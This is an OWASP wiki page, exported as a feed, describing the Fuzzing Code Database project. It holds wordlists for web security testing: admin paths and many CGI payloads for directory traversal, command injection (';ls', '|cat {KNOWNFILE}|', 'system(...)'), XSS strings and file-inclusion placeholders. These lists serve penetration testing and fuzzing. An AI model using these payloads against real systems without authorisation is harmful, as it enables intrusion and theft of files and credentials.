https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=Ulisses+Castro
OWASP - User contributions [en]
2026-05-21T07:19:07Z
User contributions
MediaWiki 1.27.2
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=106703
Category:OWASP Fuzzing Code Database
2011-03-12T19:58:37Z
<p>Ulisses Castro: </p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''08 November 2010'''<br />
<br />
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)<br />
<br />
'''15 September 2010'''<br />
<br />
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Delete 33 XSS Statement Duplicate <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included on this project: <br />
<br />
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases <br />
<br />
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. <br />
<br />
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users on the report of their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Adobe XML Files (08 November 2010) ===<br />
<pre><br />
/flex2gateway/<br />
/flex2gateway/http<br />
/flex2gateway/httpsecure<br />
/flex2gateway/cfamfpoolling<br />
/flex2gateway/amf<br />
/flex2gateway/amfpolling<br />
/messagebroker/http<br />
/messagebroker/httpsecure<br />
/blazeds/messagebroker/http<br />
/blazeds/messagebroker/httpsecure<br />
/samples/messagebroker/http<br />
/samples/messagebroker/httpsecure<br />
/lcds/messagebroker/http<br />
/lcds/messagebroker/httpsecure<br />
/lcds-samples/messagebroker/http<br />
/lcds-samples/messagebroker/httpsecure<br />
</pre><br />
<br />
=== SAP Commom URL Web Interface (15 September 2010) ===<br />
<pre><br />
/sap/bc/gui/sap/its/webgui<br />
/sap/public/icman/ping<br />
/sap/admin<br />
/sap/public/info<br />
/sap/wdisp/admin<br />
/scripts/wgate<br />
</pre><br />
<br />
=== Microsoft URLs (8 April 2010) ===<br />
<pre># Interesting IIS Files & Directories (8 April 2010)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
/.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iisadmpwd/achg.htr<br />
/iisadmpwd/aexp.htr<br />
/iisadmpwd/aexp2.htr<br />
/iisadmpwd/aexp2b.htr<br />
/iisadmpwd/aexp3.htr<br />
/iisadmpwd/aexp4.htr<br />
/iisadmpwd/aexp4b.htr<br />
/iisadmpwd/anot.htr<br />
/iisadmpwd/anot3.htr<br />
/iiasdmpwd/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/scripts/fpcount.exe<br />
/scripts/cgimail.exe<br />
/scripts/tools/newdsn.exe<br />
/scripts/tools/getdrvs.exe<br />
/scripts/convert.bas<br />
/cgi-bin/htmlscript<br />
/scripts/counter.exe<br />
/scripts/no-such-file.pl<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
/index.shtml<br />
/x.htw<br />
/x.ida<br />
/x.idq<br />
/cgi<br />
/scripts/iisadmin/ism.dll?http/dir<br />
/scripts/samples/search/webhits.exe<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
